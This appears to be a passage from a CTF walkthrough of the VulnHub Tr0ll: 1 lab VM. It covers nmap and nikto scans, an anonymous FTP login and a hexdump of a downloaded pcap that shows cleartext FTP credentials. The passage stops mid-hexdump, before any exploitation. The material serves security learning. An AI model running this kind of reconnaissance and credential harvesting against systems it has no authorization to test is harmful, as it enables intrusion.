Tr0ll: 1
20 May 2019 | WalkthroughsVulnHub URL: https://www.vulnhub.com/entry/tr0ll-1,100/
Hostname: troll
IP Address: 10.183.0.218
Information Gathering/Recon
The IP address is obtained via DHCP at boot. In my case, the IP is 10.183.0.218.
Service Enumeration/Scanning
root@kali:~/Walkthroughs/tr0ll# nmap -Pn -sT -sV -A --script=default,banner -oA tr0ll -p- 10.183.0.218
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-19 22:16 CDT
Nmap scan report for troll.homenet.dom (10.183.0.218)
Host is up (0.0038s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
|_banner: 220 (vsFTPd 3.0.2)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.183.0.222
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:39:E9:62 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 3.80 ms troll.homenet.dom (10.183.0.218)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.58 seconds
Gaining Access
Checking on the service information returned from nmap, we have the following software:
-
vsFTPd 3.0.2 - no known exploits
-
OpenSSH_6.6.1p1 - common username enumeration issues
-
Apache/2.4.7 - a potential code execution issue when paired with PHP 7.0.2
The only software issue that might be of interest involves Apache, but it requires a specific version of PHP. Nikto might be able to tell us which version of PHP is in use.
root@kali:~/Walkthroughs/tr0ll# nikto -h http://10.183.0.218
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.183.0.218
+ Target Hostname: 10.183.0.218
+ Target Port: 80
+ Start Time: 2019-05-19 22:24:57 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2019-05-19 22:25:36 (GMT-5) (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Well, we didn't get a PHP version from Nikto. We'll have to do some manual digging to see if we can tell. Before we do that, though, I'd like to check out the FTP service.
Nmap already told us quite a bit about it. It allows anonymous access. It has a single readable (and writable) pcap file named lol.pcap. Pcap files can be dangerous to just open, so we'll download it, but handle it with care.
root@kali:~/Walkthroughs/tr0ll# ftp 10.183.0.218
Connected to 10.183.0.218.
220 (vsFTPd 3.0.2)
Name (10.183.0.218:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.04 secs (208.9951 kB/s)
ftp> put test.txt test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> quit
221 Goodbye.
We were able to login and download the pcap file. We also tried uploading a test file (just to see if we could). Permission was denied.
Using hexdump to view the file contents...
root@kali:~/Walkthroughs/tr0ll# hexdump -C lol.pcap
00000000 0a 0d 0d 0a 6c 00 00 00 4d 3c 2b 1a 01 00 00 00 |....l...M<+.....|
00000010 ff ff ff ff ff ff ff ff 03 00 14 00 4c 69 6e 75 |............Linu|
00000020 78 20 33 2e 31 32 2d 6b 61 6c 69 31 2d 34 38 36 |x 3.12-kali1-486|
00000030 04 00 2f 00 44 75 6d 70 63 61 70 20 31 2e 31 30 |../.Dumpcap 1.10|
00000040 2e 32 20 28 53 56 4e 20 52 65 76 20 35 31 39 33 |.2 (SVN Rev 5193|
00000050 34 20 66 72 6f 6d 20 2f 74 72 75 6e 6b 2d 31 2e |4 from /trunk-1.|
00000060 31 30 29 00 00 00 00 00 6c 00 00 00 01 00 00 00 |10).....l.......|
00000070 54 00 00 00 01 00 00 00 ff ff 00 00 02 00 04 00 |T...............|
00000080 65 74 68 30 09 00 01 00 06 00 00 00 0b 00 0e 00 |eth0............|
00000090 00 68 6f 73 74 20 31 30 2e 30 2e 30 2e 36 00 00 |.host 10.0.0.6..|
000000a0 0c 00 14 00 4c 69 6e 75 78 20 33 2e 31 32 2d 6b |....Linux 3.12-k|
000000b0 61 6c 69 31 2d 34 38 36 00 00 00 00 54 00 00 00 |ali1-486....T...|
000000c0 06 00 00 00 6c 00 00 00 00 00 00 00 41 00 05 00 |....l.......A...|
000000d0 1b 1b 2c 8b 4a 00 00 00 4a 00 00 00 00 0c 29 20 |..,.J...J.....) |
000000e0 70 99 00 0c 29 5d 04 92 08 00 45 00 00 3c c8 14 |p...)]....E..<..|
000000f0 40 00 40 06 5e 96 0a 00 00 0c 0a 00 00 06 cc e1 |@.@.^...........|
00000100 00 15 62 2c 07 e1 00 00 00 00 a0 02 72 10 ba dc |..b,........r...|
00000110 00 00 02 04 05 b4 04 02 08 0a 00 05 cf f5 00 00 |................|
00000120 00 00 01 03 03 0a 00 00 6c 00 00 00 06 00 00 00 |........l.......|
00000130 6c 00 00 00 00 00 00 00 41 00 05 00 64 1c 2c 8b |l.......A...d.,.|
00000140 4a 00 00 00 4a 00 00 00 00 0c 29 5d 04 92 00 0c |J...J.....)]....|
00000150 29 20 70 99 08 00 45 00 00 3c 00 00 40 00 40 06 |) p...E..<..@.@.|
00000160 26 ab 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |&..............u|
00000170 8d 20 62 2c 07 e2 a0 12 71 20 db ee 00 00 02 04 |. b,....q ......|
00000180 05 b4 04 02 08 0a 00 1a b3 21 00 05 cf f5 01 03 |.........!......|
00000190 03 05 00 00 6c 00 00 00 06 00 00 00 64 00 00 00 |....l.......d...|
000001a0 00 00 00 00 41 00 05 00 74 1c 2c 8b 42 00 00 00 |....A...t.,.B...|
000001b0 42 00 00 00 00 0c 29 20 70 99 00 0c 29 5d 04 92 |B.....) p...)]..|
000001c0 08 00 45 00 00 34 c8 15 40 00 40 06 5e 9d 0a 00 |..E..4..@.@.^...|
000001d0 00 0c 0a 00 00 06 cc e1 00 15 62 2c 07 e2 9f 75 |..........b,...u|
000001e0 8d 21 80 10 00 1d 7b bc 00 00 01 01 08 0a 00 05 |.!....{.........|
000001f0 cf f5 00 1a b3 21 00 00 64 00 00 00 06 00 00 00 |.....!..d.......|
00000200 78 00 00 00 00 00 00 00 41 00 05 00 fb 21 2c 8b |x.......A....!,.|
00000210 56 00 00 00 56 00 00 00 00 0c 29 5d 04 92 00 0c |V...V.....)]....|
00000220 29 20 70 99 08 00 45 00 00 48 3e 00 40 00 40 06 |) p...E..H>.@.@.|
00000230 e8 9e 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |...............u|
00000240 8d 21 62 2c 07 e2 80 18 03 89 1f 24 00 00 01 01 |.!b,.......$....|
00000250 08 0a 00 1a b3 22 00 05 cf f5 32 32 30 20 28 76 |....."....220 (v|
00000260 73 46 54 50 64 20 33 2e 30 2e 32 29 0d 0a 00 00 |sFTPd 3.0.2)....|
00000270 78 00 00 00 06 00 00 00 64 00 00 00 00 00 00 00 |x.......d.......|
00000280 41 00 05 00 2e 22 2c 8b 42 00 00 00 42 00 00 00 |A....",.B...B...|
00000290 00 0c 29 20 70 99 00 0c 29 5d 04 92 08 00 45 10 |..) p...)]....E.|
000002a0 00 34 c8 16 40 00 40 06 5e 8c 0a 00 00 0c 0a 00 |.4..@.@.^.......|
000002b0 00 06 cc e1 00 15 62 2c 07 e2 9f 75 8d 35 80 10 |......b,...u.5..|
000002c0 00 1d 7b a6 00 00 01 01 08 0a 00 05 cf f6 00 1a |..{.............|
000002d0 b3 22 00 00 64 00 00 00 06 00 00 00 74 00 00 00 |."..d.......t...|
000002e0 00 00 00 00 41 00 05 00 27 89 67 8b 52 00 00 00 |....A...'.g.R...|
000002f0 52 00 00 00 00 0c 29 20 70 99 00 0c 29 5d 04 92 |R.....) p...)]..|
00000300 08 00 45 10 00 44 c8 17 40 00 40 06 5e 7b 0a 00 |..E..D..@.@.^{..|
00000310 00 0c 0a 00 00 06 cc e1 00 15 62 2c 07 e2 9f 75 |..........b,...u|
00000320 8d 35 80 18 00 1d ef e4 00 00 01 01 08 0a 00 05 |.5..............|
00000330 d3 c3 00 1a b3 22 55 53 45 52 20 61 6e 6f 6e 79 |....."USER anony|
00000340 6d 6f 75 73 0d 0a 00 00 74 00 00 00 06 00 00 00 |mous....t.......|
00000350 64 00 00 00 00 00 00 00 41 00 05 00 63 8a 67 8b |d.......A...c.g.|
00000360 42 00 00 00 42 00 00 00 00 0c 29 5d 04 92 00 0c |B...B.....)]....|
00000370 29 20 70 99 08 00 45 00 00 34 3e 01 40 00 40 06 |) p...E..4>.@.@.|
00000380 e8 b1 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |...............u|
00000390 8d 35 62 2c 07 f2 80 10 03 89 70 90 00 00 01 01 |.5b,......p.....|
000003a0 08 0a 00 1a b6 ef 00 05 d3 c3 00 00 64 00 00 00 |............d...|
000003b0 06 00 00 00 84 00 00 00 00 00 00 00 41 00 05 00 |............A...|
000003c0 9f 8a 67 8b 64 00 00 00 64 00 00 00 00 0c 29 5d |..g.d...d.....)]|
000003d0 04 92 00 0c 29 20 70 99 08 00 45 00 00 56 3e 02 |....) p...E..V>.|
000003e0 40 00 40 06 e8 8e 0a 00 00 06 0a 00 00 0c 00 15 |@.@.............|
000003f0 cc e1 9f 75 8d 35 62 2c 07 f2 80 18 03 89 29 45 |...u.5b,......)E|
00000400 00 00 01 01 08 0a 00 1a b6 ef 00 05 d3 c3 33 33 |..............33|
00000410 31 20 50 6c 65 61 73 65 20 73 70 65 63 69 66 79 |1 Please specify|
00000420 20 74 68 65 20 70 61 73 73 77 6f 72 64 2e 0d 0a | the password...|
00000430 84 00 00 00 06 00 00 00 64 00 00 00 00 00 00 00 |........d.......|
00000440 41 00 05 00 c4 8a 67 8b 42 00 00 00 42 00 00 00 |A.....g.B...B...|
00000450 00 0c 29 20 70 99 00 0c 29 5d 04 92 08 00 45 10 |..) p...)]....E.|
00000460 00 34 c8 18 40 00 40 06 5e 8a 0a 00 00 0c 0a 00 |.4..@.@.^.......|
00000470 00 06 cc e1 00 15 62 2c 07 f2 9f 75 8d 57 80 10 |......b,...u.W..|
00000480 00 1d 73 da 00 00 01 01 08 0a 00 05 d3 c3 00 1a |..s.............|
00000490 b6 ef 00 00 64 00 00 00 06 00 00 00 74 00 00 00 |....d.......t...|
000004a0 00 00 00 00 41 00 05 00 5c 43 97 8b 51 00 00 00 |....A...\C..Q...|
000004b0 51 00 00 00 00 0c 29 20 70 99 00 0c 29 5d 04 92 |Q.....) p...)]..|
000004c0 08 00 45 10 00 43 c8 19 40 00 40 06 5e 7a 0a 00 |..E..C..@.@.^z..|
000004d0 00 0c 0a 00 00 06 cc e1 00 15 62 2c 07 f2 9f 75 |..........b,...u|
000004e0 8d 57 80 18 00 1d fa 45 00 00 01 01 08 0a 00 05 |.W.....E........|
000004f0 d6 d1 00 1a b6 ef 50 41 53 53 20 70 61 73 73 77 |......PASS passw|
00000500 6f 72 64 0d 0a 00 00 00 74 00 00 00 06 00 00 00 |ord.....t.......|
00000510 7c 00 00 00 00 00 00 00 41 00 05 00 ee 47 97 8b ||.......A....G..|
00000520 59 00 00 00 59 00 00 00 00 0c 29 5d 04 92 00 0c |Y...Y.....)]....|
00000530 29 20 70 99 08 00 45 00 00 4b 3e 03 40 00 40 06 |) p...E..K>.@.@.|
00000540 e8 98 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |...............u|
00000550 8d 57 62 2c 08 01 80 18 03 89 88 ab 00 00 01 01 |.Wb,............|
00000560 08 0a 00 1a b9 fd 00 05 d6 d1 32 33 30 20 4c 6f |..........230 Lo|
00000570 67 69 6e 20 73 75 63 63 65 73 73 66 75 6c 2e 0d |gin successful..|
00000580 0a 00 00 00 7c 00 00 00 06 00 00 00 64 00 00 00 |....|.......d...|
00000590 00 00 00 00 41 00 05 00 22 48 97 8b 42 00 00 00 |....A..."H..B...|
000005a0 42 00 00 00 00 0c 29 20 70 99 00 0c 29 5d 04 92 |B.....) p...)]..|
000005b0 08 00 45 10 00 34 c8 1a 40 00 40 06 5e 88 0a 00 |..E..4..@.@.^...|
000005c0 00 0c 0a 00 00 06 cc e1 00 15 62 2c 08 01 9f 75 |..........b,...u|
000005d0 8d 6e 80 10 00 1d 6d 98 00 00 01 01 08 0a 00 05 |.n....m.........|
000005e0 d6 d1 00 1a b9 fd 00 00 64 00 00 00 06 00 00 00 |........d.......|
000005f0 68 00 00 00 00 00 00 00 41 00 05 00 73 48 97 8b |h.......A...sH..|
00000600 48 00 00 00 48 00 00 00 00 0c 29 20 70 99 00 0c |H...H.....) p...|
00000610 29 5d 04 92 08 00 45 10 00 3a c8 1b 40 00 40 06 |)]....E..:..@.@.|
00000620 5e 81 0a 00 00 0c 0a 00 00 06 cc e1 00 15 62 2c |^.............b,|
00000630 08 01 9f 75 8d 6e 80 18 00 1d b9 d2 00 00 01 01 |...u.n..........|
00000640 08 0a 00 05 d6 d1 00 1a b9 fd 53 59 53 54 0d 0a |..........SYST..|
00000650 68 00 00 00 06 00 00 00 78 00 00 00 00 00 00 00 |h.......x.......|
00000660 41 00 05 00 4d 51 97 8b 55 00 00 00 55 00 00 00 |A...MQ..U...U...|
00000670 00 0c 29 5d 04 92 00 0c 29 20 70 99 08 00 45 00 |..)]....) p...E.|
00000680 00 47 3e 04 40 00 40 06 e8 9b 0a 00 00 06 0a 00 |.G>.@.@.........|
00000690 00 0c 00 15 cc e1 9f 75 8d 6e 62 2c 08 07 80 18 |.......u.nb,....|
000006a0 03 89 02 bb 00 00 01 01 08 0a 00 1a b9 fd 00 05 |................|
000006b0 d6 d1 32 31 35 20 55 4e 49 58 20 54 79 70 65 3a |..215 UNIX Type:|
000006c0 20 4c 38 0d 0a 00 00 00 78 00 00 00 06 00 00 00 | L8.....x.......|
000006d0 64 00 00 00 00 00 00 00 41 00 05 00 e6 ef 97 8b |d.......A.......|
000006e0 42 00 00 00 42 00 00 00 00 0c 29 20 70 99 00 0c |B...B.....) p...|
000006f0 29 5d 04 92 08 00 45 10 00 34 c8 1c 40 00 40 06 |)]....E..4..@.@.|
00000700 5e 86 0a 00 00 0c 0a 00 00 06 cc e1 00 15 62 2c |^.............b,|
00000710 08 07 9f 75 8d 81 80 10 00 1d 6d 74 00 00 01 01 |...u......mt....|
00000720 08 0a 00 05 d6 dc 00 1a b9 fd 00 00 64 00 00 00 |............d...|
00000730 06 00 00 00 7c 00 00 00 00 00 00 00 41 00 05 00 |....|.......A...|
00000740 be de c1 8b 5a 00 00 00 5a 00 00 00 00 0c 29 20 |....Z...Z.....) |
00000750 70 99 00 0c 29 5d 04 92 08 00 45 10 00 4c c8 1d |p...)]....E..L..|
00000760 40 00 40 06 5e 6d 0a 00 00 0c 0a 00 00 06 cc e1 |@.@.^m..........|
00000770 00 15 62 2c 08 07 9f 75 8d 81 80 18 00 1d 10 42 |..b,...u.......B|
00000780 00 00 01 01 08 0a 00 05 d9 8b 00 1a b9 fd 50 4f |..............PO|
00000790 52 54 20 31 30 2c 30 2c 30 2c 31 32 2c 31 37 33 |RT 10,0,0,12,173|
000007a0 2c 31 39 38 0d 0a 00 00 7c 00 00 00 06 00 00 00 |,198....|.......|
000007b0 98 00 00 00 00 00 00 00 41 00 05 00 3a e0 c1 8b |........A...:...|
000007c0 75 00 00 00 75 00 00 00 00 0c 29 5d 04 92 00 0c |u...u.....)]....|
000007d0 29 20 70 99 08 00 45 00 00 67 3e 05 40 00 40 06 |) p...E..g>.@.@.|
000007e0 e8 7a 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |.z.............u|
000007f0 8d 81 62 2c 08 1f 80 18 03 89 b9 26 00 00 01 01 |..b,.......&....|
00000800 08 0a 00 1a bc b7 00 05 d9 8b 32 30 30 20 50 4f |..........200 PO|
00000810 52 54 20 63 6f 6d 6d 61 6e 64 20 73 75 63 63 65 |RT command succe|
00000820 73 73 66 75 6c 2e 20 43 6f 6e 73 69 64 65 72 20 |ssful. Consider |
00000830 75 73 69 6e 67 20 50 41 53 56 2e 0d 0a 00 00 00 |using PASV......|
00000840 98 00 00 00 06 00 00 00 64 00 00 00 00 00 00 00 |........d.......|
00000850 41 00 05 00 69 e0 c1 8b 42 00 00 00 42 00 00 00 |A...i...B...B...|
00000860 00 0c 29 20 70 99 00 0c 29 5d 04 92 08 00 45 10 |..) p...)]....E.|
00000870 00 34 c8 1e 40 00 40 06 5e 84 0a 00 00 0c 0a 00 |.4..@.@.^.......|
00000880 00 06 cc e1 00 15 62 2c 08 1f 9f 75 8d b4 80 10 |......b,...u....|
00000890 00 1d 67 c0 00 00 01 01 08 0a 00 05 d9 8b 00 1a |..g.............|
000008a0 bc b7 00 00 64 00 00 00 06 00 00 00 68 00 00 00 |....d.......h...|
000008b0 00 00 00 00 41 00 05 00 b5 e0 c1 8b 48 00 00 00 |....A.......H...|
000008c0 48 00 00 00 00 0c 29 20 70 99 00 0c 29 5d 04 92 |H.....) p...)]..|
000008d0 08 00 45 10 00 3a c8 1f 40 00 40 06 5e 7d 0a 00 |..E..:..@.@.^}..|
000008e0 00 0c 0a 00 00 06 cc e1 00 15 62 2c 08 1f 9f 75 |..........b,...u|
000008f0 8d b4 80 18 00 1d bb 0a 00 00 01 01 08 0a 00 05 |................|
00000900 d9 8b 00 1a bc b7 4c 49 53 54 0d 0a 68 00 00 00 |......LIST..h...|
00000910 06 00 00 00 6c 00 00 00 00 00 00 00 41 00 05 00 |....l.......A...|
00000920 a7 e1 c1 8b 4a 00 00 00 4a 00 00 00 00 0c 29 5d |....J...J.....)]|
00000930 04 92 00 0c 29 20 70 99 08 00 45 00 00 3c 1d b3 |....) p...E..<..|
00000940 40 00 40 06 08 f8 0a 00 00 06 0a 00 00 0c 00 14 |@.@.............|
00000950 ad c6 3a 0e a1 04 00 00 00 00 a0 02 72 10 7c 21 |..:.........r.|!|
00000960 00 00 02 04 05 b4 04 02 08 0a 00 1a bc b7 00 00 |................|
00000970 00 00 01 03 03 05 00 00 6c 00 00 00 06 00 00 00 |........l.......|
00000980 6c 00 00 00 00 00 00 00 41 00 05 00 b6 e1 c1 8b |l.......A.......|
00000990 4a 00 00 00 4a 00 00 00 00 0c 29 20 70 99 00 0c |J...J.....) p...|
000009a0 29 5d 04 92 08 00 45 00 00 3c 00 00 40 00 40 06 |)]....E..<..@.@.|
000009b0 26 ab 0a 00 00 0c 0a 00 00 06 ad c6 00 14 05 0e |&...............|
000009c0 04 92 3a 0e a1 05 a0 12 71 20 99 ca 00 00 02 04 |..:.....q ......|
000009d0 05 b4 04 02 08 0a 00 05 d9 8b 00 1a bc b7 01 03 |................|
000009e0 03 0a 00 00 6c 00 00 00 06 00 00 00 64 00 00 00 |....l.......d...|
000009f0 00 00 00 00 41 00 05 00 2d e2 c1 8b 42 00 00 00 |....A...-...B...|
00000a00 42 00 00 00 00 0c 29 5d 04 92 00 0c 29 20 70 99 |B.....)]....) p.|
00000a10 08 00 45 00 00 34 1d b4 40 00 40 06 08 ff 0a 00 |..E..4..@.@.....|
00000a20 00 06 0a 00 00 0c 00 14 ad c6 3a 0e a1 05 05 0e |..........:.....|
00000a30 04 93 80 10 03 91 36 29 00 00 01 01 08 0a 00 1a |......6)........|
00000a40 bc b7 00 05 d9 8b 00 00 64 00 00 00 06 00 00 00 |........d.......|
00000a50 8c 00 00 00 00 00 00 00 41 00 05 00 bb e2 c1 8b |........A.......|
00000a60 69 00 00 00 69 00 00 00 00 0c 29 5d 04 92 00 0c |i...i.....)]....|
00000a70 29 20 70 99 08 00 45 00 00 5b 3e 06 40 00 40 06 |) p...E..[>.@.@.|
00000a80 e8 85 0a 00 00 06 0a 00 00 0c 00 15 cc e1 9f 75 |...............u|
00000a90 8d b4 62 2c 08 25 80 18 03 89 4f 01 00 00 01 01 |..b,.%....O.....|
00000aa0 08 0a 00 1a bc b7 00 05 d9 8b 31 35 30 20 48 65 |..........150 He|
00000ab0 72 65 20 63 6f 6d 65 73 20 74 68 65 20 64 69 72 |re comes the dir|
00000ac0 65 63 74 6f 72 79 20 6c 69 73 74 69 6e 67 2e 0d |ectory listing..|
00000ad0 0a 00 00 00 8c 00 00 00 06 00 00 00 ac 00 00 00 |................|
00000ae0 00 00 00 00 41 00 05 00 55 e3 c1 8b 8c 00 00 00 |....A...U.......|
00000af0 8c 00 00 00 00 0c 29 5d 04 92 00 0c 29 20 70 99 |......)]....) p.|
00000b00 08 00 45 08 00 7e 1d b5 40 00 40 06 08 ac 0a 00 |..E..~..@.@.....|
00000b10 00 06 0a 00 00 0c 00 14 ad c6 3a 0e a1 05 05 0e |..........:.....|
00000b20 04 93 80 18 03 91 da 24 00 00 01 01 08 0a 00 1a |.......$........|
00000b30 bc b7 00 05 d9 8b 2d 72 77 2d 72 2d 2d 72 2d 2d |......-rw-r--r--|
00000b40 20 20 20 20 31 20 30 20 20 20 20 20 20 20 20 30 | 1 0 0|
00000b50 20 20 20 20 20 20 20 20 20 20 20 20 20 31 34 37 | 147|
00000b60 20 41 75 67 20 31 30 20 30 30 3a 33 38 20 73 65 | Aug 10 00:38 se|
00000b70 63 72 65 74 5f 73 74 75 66 66 2e 74 78 74 0d 0a |cret_stuff.txt..|
00000b80 ac 00 00 00 06 00 00 00 64 00 00 00 00 00 00 00 |........d.......|
00000b90 41 00 05 00 59 e3 c1 8b 42 00 00 00 42 00 00 00 |A...Y...B...B...|
00000ba0 00 0c 29 5d 04 92 00 0c 29 20 70 99 08 00 45 08 |..)]....) p...E.|
00000bb0 00 34 1d b6 40 00 40 06 08 f5 0a 00 00 06 0a 00 |.4..@.@.........|
00000bc0 00 0c 00 14 ad c6 3a 0e a1 4f 05 0e 04 93 80 11 |......:..O......|
00000bd0 03 91 35 de 00 00 01 01 08 0a 00 1a bc b7 00 05 |..5.............|
00000be0 d9 8b 00 00 64 00 00 00 06 00 00 00 64 00 00 00 |....d.......d...|
00000bf0 00 00 00 00 41 00 05 00 80 e3 c1 8b 42 00 00 00 |....A.......B...|
00000c00 42 00 00 00 00 0c 29 20 70 99 00 0c 29 5d 04 92 |B.....) p...)]..|
00000c10 08 00 45 08 00 34 dd 18 40 00 40 06 49 92 0a 00 |..E..4..@.@.I...|
00000c20 00 0c 0a 00 00 06 ad c6 00 14 05 0e 04 93 3a 0e |..............:.|
00000c30 a1 4f 80 10 00 1d 39 53 00 00 01 01 08 0a 00 05 |.O....9S........|
00000c40 d9 8b 00 1a bc b7 00 00 64 00 00 00 06 00 00 00 |........d.......|
00000c50 64 00 00 00 00 00 00 00 41 00 05 00 ca e3 c1 8b |d.......A.......|
00000c60 42 00 00 00 42 00 00 00 00 0c 29 20 70 99 00 0c |B...B.....) p...|
00000c70 29 5d 04 92 08 00 45 08 00 34 dd 19 40 00 40 06 |)]....E..4..@.@.|
00000c80 49 91 0a 00 00 0c 0a 00 00 06 ad c6 00 14 05 0e |I...............|
00000c90 04 93 3a 0e a1 50 80 11 00 1d 39 51 00 00 01 01 |..:..P....9Q....|
00000ca0 08 0a 00 05 d9 8b 00 1a bc b7 00 00 64 00 00 00 |............d...|
00000cb0 06 00 00 00 64 00 00 00 00 00 00 00 41 00 05 00 |....d.......A...|
00000cc0 51 e4 c1 8b 42 00 00 00 42 00 00 00 00 0c 29 5d |Q...B...B.....)]|
00000cd0 04 92 00 0c 29 20 70 99 08 00 45 08 00 34 1d b7 |....) p...E..4..|
00000ce0 40 00 40 06 08 f4 0a 00 00 06 0a 00 00 0c 00 14 |@.@.............|
00000cf0 ad c6 3a 0e a1 50 05 0e 04 94 80 10 03 91 35 dd |..:..P........5.|
00000d00 00 00 01 01 08 0a 00 1a bc b7 00 05 d9 8b 00 00 |................|
00000d10 64 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 |d.......|.......|
00000d20 41 00 05 00 96 e4 c1 8b 5a 00 00 00 5a 00 00 00 |A.......Z...Z...|
00000d30 00 0c 29 5d 04 92 00 0c 29 20 70 99 08 00 45 00 |..)]....) p...E.|
00000d40 00 4c 3e 07 40 00 40 06 e8 93 0a 00 00 06 0a 00 |.L>.@.@.........|
00000d50 00 0c 00 15 cc e1 9f 75 8d db 62 2c 08 25 80 18 |.......u..b,.%..|
00000d60 03 89 9e 8d 00 00 01 01 08 0a 00 1a bc b7 00 05 |................|
00000d70 d9 8b 32 32 36 20 44 69 72 65 63 74 6f 72 79 20 |..226 Directory |
00000d80 73 65 6e 64 20 4f 4b 2e 0d 0a 00 00 7c 00 00 00 |send OK.....|...|
00000d90 06 00 00 00 64 00 00 00 00 00 00 00 41 00 05 00 |....d.......A...|
00000da0 b5 e4 c1 8b 42 00 00 00 42 00 00 00 00 0c 29 20 |....B...B.....) |
00000db0 70 99 00 0c 29 5d 04 92 08 00 45 10 00 34 c8 20 |p...)]....E..4. |
00000dc0 40 00 40 06 5e 82 0a 00 00 0c 0a 00 00 06 cc e1 |@.@.^...........|
00000dd0 00 15 62 2c 08 25 9f 75 8d f3 80 10 00 1d 67 7b |..b,.%.u......g{|
00000de0 00 00 01 01 08 0a 00 05 d9 8b 00 1a bc b7 00 00 |................|
00000df0 64 00 00 00 06 00 00 00 6c 00 00 00 00 00 00 00 |d.......l.......|
00000e00 41 00 05 00 4f b0 3b 8c 4a 00 00 00 4a 00 00 00 |A...O.;.J...J...|
00000e10 00 0c 29 20 70 99 00 0c 29 5d 04 92 08 00 45 10 |..) p...)]....E.|
00000e20 00 3c c8 21 40 00 40 06 5e 79 0a 00 00 0c 0a 00 |.<.!@.@.^y......|
00000e30 00 06 cc e1 00 15 62 2c 08 25 9f 75 8d f3 80 18 |......b,.%.u....|
00000e40 00 1d 8d ad 00 00 01 01 08 0a 00 05 e1 57 00 1a |.............W..|
00000e50 bc b7 54 59 50 45 20 49 0d 0a 00 00 6c 00 00 00 |..TYPE I....l...|
00000e60 06 00 00 00 84 00 00 00 00 00 00 00 41 00 05 00 |............A...|
00000e70 be b1 3b 8c 61 00 00 00 61 00 00 00 00 0c 29 5d |..;.a...a.....)]|
00000e80 04 92 00 0c 29 20 70 99 08 00 45 00 00 53 3e 08 |....) p...E..S>.|
00000e90 40 00 40 06 e8 8b 0a 00 00 06 0a 00 00 0c 00 15 |@.@.............|
00000ea0 cc e1 9f 75 8d f3 62 2c 08 2d 80 18 03 89 1e 80 |...u..b,.-......|
00000eb0 00 00 01 01 08 0a 00 1a c4 83 00 05 e1 57 32 30 |.............W20|
00000ec0 30 20 53 77 69 74 63 68 69 6e 67 20 74 6f 20 42 |0 Switching to B|
00000ed0 69 6e 61 72 79 20 6d 6f 64 65 2e 0d 0a 00 00 00 |inary mode......|
00000ee0 84 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 |........|.......|
00000ef0 41 00 05 00 ff b1 3b 8c 5a 00 00 00 5a 00 00 00 |A.....;.Z...Z...|
00000f00 00 0c 29 20 70 99 00 0c 29 5d 04 92 08 00 45 10 |..) p...)]....E.|
00000f10 00 4c c8 22 40 00 40 06 5e 68 0a 00 00 0c 0a 00 |.L."@.@.^h......|
00000f20 00 06 cc e1 00 15 62 2c 08 2d 9f 75 8e 12 80 18 |......b,.-.u....|
00000f30 00 1d 06 3f 00 00 01 01 08 0a 00 05 e1 57 00 1a |...?.........W..|
00000f40 c4 83 50 4f 52 54 20 31 30 2c 30 2c 30 2c 31 32 |..PORT 10,0,0,12|
